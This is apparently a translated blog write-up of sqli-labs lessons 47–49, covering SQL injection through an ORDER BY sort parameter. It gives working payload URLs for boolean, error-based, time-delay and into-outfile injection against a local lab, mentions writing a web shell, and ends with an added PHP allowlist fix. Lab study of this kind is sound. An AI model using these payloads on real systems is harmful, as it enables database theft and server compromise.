• SQL Injection: Sqli-labs Series, Lessons 47, 48 and 49 (ORDER BY Injection)


    0x1 Differences in the source code

    The id is changed to a string type:
    $sql = "SELECT * FROM users ORDER BY '$id'";

    0x2 Hands-on tests

    (1) Combining and with rand()

    payload:
    http://localhost/sqli-labs-master/Less-47/?sort=1' and rand(ascii(left(database(),1))=116)--+ 

    (2) Using error-based injection

    http://192.168.232.135/sqli-labs/Less-47/?sort=1' and (select 1 from(select count(*),concat(0x5c,database(),0x5c,floor(rand(0)*2))x from information_schema.tables group by x)a)--+

    Statement taken from the web:
    http://localhost/sqli-labs-master/Less-47/?sort=1' and (select count(*) from information_schema.columns group by concat(0x3e,0x3e,(select database()),0x3e,0x3e,floor(rand()*2)) limit 0,1)--+

     

    (3) An alternative error-based statement

    http://192.168.232.135/sqli-labs/Less-47/?sort=1' and (select * from (select NAME_CONST(version(),1),NAME_CONST(version(),1))x)--+  

    (4) Time-delay injection

    http://192.168.232.135/sqli-labs/Less-47/?sort=1' and (if(ascii(substr(database(),1,1))=116,0,sleep(5)))--+  

    (5) Exporting a file with into outfile

    http://localhost:81/sqli-labs-master/Less-47/index.php?sort=1' into outfile "C:/testphp/Apache24/htdocs/sqli-labs-master/Less-47/test.txt" 

    Writing a web shell

    The hexadecimal that follows is <? php phpinfo();?>

    0x3 Lesson 48

    The difference between this lesson and Lesson 47 is that there are no error messages; into outfile can also be used.

    http://192.168.232.135/sqli-labs/Less-47/?sort=1' and (if(ascii(substr((select username from users limit 0,1),1,1))=69,0,sleep(1)))--+  

    0x4 Lesson 49

    The difference between this lesson and Lesson 47 is that there are no error messages.

    http://192.168.232.135/sqli-labs-master/Less-49/?sort=1' and (if(ascii(substr((select username from users limit 0,1),1,1))=69,0,sleep(1)))--+  
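
The query from 0x1 in hardened form, as an added example that is not part of the original post or of sqli-labs: the sort value is mapped through an allowlist, because a prepared-statement placeholder binds values and cannot bind an ORDER BY target. The function name, the sort keys 1/2/3 and the columns id and password are assumptions.

```php
<?php
// Added example (not from the original post): allowlisted ORDER BY.
// Assumptions: the users table has columns id, username and password;
// build_users_query() and the sort keys 1/2/3 are hypothetical names.

// Vulnerable form from the lesson: the request value becomes SQL text.
//   $sql = "SELECT * FROM users ORDER BY '$id'";

/**
 * Map the untrusted ?sort= value to a fixed column name.
 * Nothing from the request is ever copied into the SQL string, so the
 * rand(), error-based, sleep() and into outfile variants have no way in.
 */
function build_users_query($sort, $dir = 'asc'): string
{
    // Allowlist: request key => real column name.
    $columns = ['1' => 'id', '2' => 'username', '3' => 'password'];

    // ?sort[]=x arrives as an array; treat any non-scalar as an unknown key.
    $key = is_scalar($sort) ? (string) $sort : '';

    // Unknown keys fall back to the default column.
    $column = $columns[$key] ?? 'id';

    // The direction is a fixed keyword chosen here, never the raw input.
    $direction = (is_string($dir) && strtolower($dir) === 'desc') ? 'DESC' : 'ASC';

    return "SELECT * FROM users ORDER BY `$column` $direction";
}

// Constructed sample inputs: a valid key, the time-delay string from (4),
// and an array value.
$samples = [
    '2',
    "1' and (if(ascii(substr(database(),1,1))=116,0,sleep(5)))-- ",
    ['x'],
];

foreach ($samples as $sample) {
    echo build_users_query($sample), PHP_EOL;
}
```

Only the first sample selects a non-default column; the other two fall back to ordering by id because they match no allowlist key.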
  • Original article: https://www.cnblogs.com/AmoBlogs/p/8725793.html